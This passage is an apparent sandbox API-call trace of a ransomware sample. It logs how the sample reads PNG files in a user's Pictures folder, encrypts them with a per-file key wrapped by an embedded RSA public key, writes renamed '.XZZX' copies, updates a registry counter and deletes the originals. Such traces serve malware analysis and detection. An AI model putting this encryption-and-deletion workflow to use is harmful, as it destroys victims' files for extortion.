lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0127.029] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcacb [0127.029] WriteFile (in: hFile=0x61c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x2a, lpOverlapped=0x0) returned 1 [0127.029] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcaf5 [0127.029] WriteFile (in: hFile=0x61c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0127.029] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcafa [0127.029] SetErrorMode (uMode=0x1) returned 0x1 [0127.029] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0127.029] OutputDebugStringW (lpOutputString="end") [0127.029] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.029] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0127.029] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1e5f0) returned 1 [0127.030] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1e5f0, dwCertEncodingType=0x1, pInfo=0x3d0dc98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0dcc8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0dcd0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde118) returned 1 [0127.030] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0127.030] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0127.030] CryptEncrypt (in: hKey=0x3cde118, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0127.030] CryptEncrypt (in: hKey=0x3cde118, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1e678*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1e678*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0127.030] WriteFile (in: hFile=0x61c, lpBuffer=0x3d1e678*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1e678*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0127.030] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0127.030] WriteFile (in: hFile=0x61c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0127.030] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0127.031] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0127.031] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x628) returned 0x0 [0127.031] RegQueryValueExW (in: hKey=0x628, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x9e, lpcbData=0x420dfdc*=0x4) returned 0x0 [0127.031] RegCloseKey (hKey=0x628) returned 0x0 [0127.031] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x628) returned 0x0 [0127.031] RegSetValueExW (in: hKey=0x628, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x9f, cbData=0x4 | out: lpData=0x420dfec*=0x9f) returned 0x0 [0127.031] RegCloseKey (hKey=0x628) returned 0x0 [0127.031] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.031] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.031] CloseHandle (hObject=0x61c) returned 1 [0127.032] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0127.033] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0127.033] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XL uwZp2bbBe4jnmB.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xl uwzp2bbbe4jnmb.png")) returned 1 [0127.034] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XL uwZp2bbBe4jnmB.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xl uwzp2bbbe4jnmb.png")) returned 0 Thread: id = 423 os_tid = 0x9ac [0127.034] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0127.034] lstrcpyW (in: lpString1=0x434f460, lpString2="y5Mqnfp y9ox7lXm62.png" | out: lpString1="y5Mqnfp y9ox7lXm62.png") returned="y5Mqnfp y9ox7lXm62.png" [0127.034] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0127.035] SetErrorMode (uMode=0x1) returned 0x1 [0127.035] lstrcpyW (in: lpString1=0x434f860, lpString2="y5Mqnfp y9ox7lXm62.png" | out: lpString1="y5Mqnfp y9ox7lXm62.png") returned="y5Mqnfp y9ox7lXm62.png" [0127.035] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0xcb17194f, Data2=0x2291, Data3=0x46e3, Data4=([0]=0x80, [1]=0xd0, [2]=0xab, [3]=0xde, [4]=0x43, [5]=0xfb, [6]=0xf5, [7]=0xc))) returned 0x0 [0127.035] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\y5Mqnfp y9ox7lXm62.png") returned 65 [0127.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0127.035] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1971D3BF09924C93CB17194F0DC730DB.XZZX") returned 80 [0127.035] StrStrW (lpFirst="y5Mqnfp y9ox7lXm62.png", lpSrch="XZZX") returned 0x0 [0127.035] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\y5Mqnfp y9ox7lXm62.png", dwFileAttributes=0x20) returned 1 [0127.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\y5Mqnfp y9ox7lXm62.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y5mqnfp y9ox7lxm62.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0127.035] ReadFile (in: hFile=0x610, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0xebf0, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x434e418*=0xebf0, lpOverlapped=0x0) returned 1 [0127.036] CloseHandle (hObject=0x610) returned 1 [0127.036] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0127.037] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0127.037] SetErrorMode (uMode=0x1) returned 0x1 [0127.037] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0127.037] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1e700) returned 1 [0127.039] CryptGenKey (in: hProv=0x3d1e700, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde058) returned 1 [0127.162] CryptExportKey (in: hKey=0x3cde058, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0127.162] CryptExportKey (in: hKey=0x3cde058, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0127.162] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0127.163] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0127.163] CryptDestroyKey (hKey=0x3cde058) returned 1 [0127.163] CryptReleaseContext (hProv=0x3d1e700, dwFlags=0x0) returned 1 [0127.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1971D3BF09924C93CB17194F0DC730DB.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\1971d3bf09924c93cb17194f0dc730db.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0127.164] WriteFile (in: hFile=0x610, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0xebf0, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x434e438*=0xebf0, lpOverlapped=0x0) returned 1 [0127.165] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xebf0 [0127.165] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0127.165] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xebf5 [0127.165] WriteFile (in: hFile=0x610, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x2c, lpOverlapped=0x0) returned 1 [0127.165] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xec21 [0127.165] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0127.165] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xec26 [0127.165] SetErrorMode (uMode=0x1) returned 0x1 [0127.165] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0127.166] OutputDebugStringW (lpOutputString="end") [0127.166] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.166] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0127.166] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3d1e700) returned 1 [0127.166] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1e700, dwCertEncodingType=0x1, pInfo=0x3d0dd68*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0dd98*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0dda0*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cde158) returned 1 [0127.166] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0127.167] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0127.167] CryptEncrypt (in: hKey=0x3cde158, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0127.167] CryptEncrypt (in: hKey=0x3cde158, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1e788*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1e788*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0127.167] WriteFile (in: hFile=0x610, lpBuffer=0x3d1e788*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1e788*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0127.167] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0127.167] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0127.167] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0127.168] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0127.168] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x628) returned 0x0 [0127.168] RegQueryValueExW (in: hKey=0x628, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x9f, lpcbData=0x434dfdc*=0x4) returned 0x0 [0127.168] RegCloseKey (hKey=0x628) returned 0x0 [0127.168] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x628) returned 0x0 [0127.168] RegSetValueExW (in: hKey=0x628, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xa0, cbData=0x4 | out: lpData=0x434dfec*=0xa0) returned 0x0 [0127.168] RegCloseKey (hKey=0x628) returned 0x0 [0127.168] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.169] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.169] CloseHandle (hObject=0x610) returned 1 [0127.170] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0127.171] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0127.171] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\y5Mqnfp y9ox7lXm62.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y5mqnfp y9ox7lxm62.png")) returned 1 [0127.172] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\y5Mqnfp y9ox7lXm62.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y5mqnfp y9ox7lxm62.png")) returned 0 Thread: id = 424 os_tid = 0x9b0 [0127.318] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0127.318] lstrcpyW (in: lpString1=0x420f460, lpString2="Yj-AfpoJM9u50s86.png" | out: lpString1="Yj-AfpoJM9u50s86.png") returned="Yj-AfpoJM9u50s86.png" [0127.318] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0127.318] SetErrorMode (uMode=0x1) returned 0x1 [0127.318] lstrcpyW (in: lpString1=0x420f860, lpString2="Yj-AfpoJM9u50s86.png" | out: lpString1="Yj-AfpoJM9u50s86.png") returned="Yj-AfpoJM9u50s86.png" [0127.318] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x504955a0, Data2=0x9d92, Data3=0x475f, Data4=([0]=0x80, [1]=0x32, [2]=0xaa, [3]=0x74, [4]=0xd7, [5]=0xbe, [6]=0x7f, [7]=0xa9))) returned 0x0 [0127.318] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Yj-AfpoJM9u50s86.png") returned 63 [0127.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0127.318] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C355F5402BEDF72E504955A0300EDB76.XZZX") returned 80 [0127.318] StrStrW (lpFirst="Yj-AfpoJM9u50s86.png", lpSrch="XZZX") returned 0x0 [0127.318] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Yj-AfpoJM9u50s86.png", dwFileAttributes=0x20) returned 1 [0127.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Yj-AfpoJM9u50s86.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yj-afpojm9u50s86.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0127.319] ReadFile (in: hFile=0x61c, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0xdcfb, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x420e418*=0xdcfb, lpOverlapped=0x0) returned 1 [0127.320] CloseHandle (hObject=0x61c) returned 1 [0127.320] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0127.320] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0127.320] SetErrorMode (uMode=0x1) returned 0x1 [0127.320] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0127.320] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1e810) returned 1 [0127.326] CryptGenKey (in: hProv=0x3d1e810, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde058) returned 1 [0127.602] CryptExportKey (in: hKey=0x3cde058, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0127.602] CryptExportKey (in: hKey=0x3cde058, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0127.602] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0127.603] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0127.603] CryptDestroyKey (hKey=0x3cde058) returned 1 [0127.603] CryptReleaseContext (hProv=0x3d1e898, dwFlags=0x0) returned 0 [0127.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C355F5402BEDF72E504955A0300EDB76.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c355f5402bedf72e504955a0300edb76.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x62c [0127.604] WriteFile (in: hFile=0x62c, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0xdcfb, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x420e438*=0xdcfb, lpOverlapped=0x0) returned 1 [0127.605] SetFilePointer (in: hFile=0x62c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: 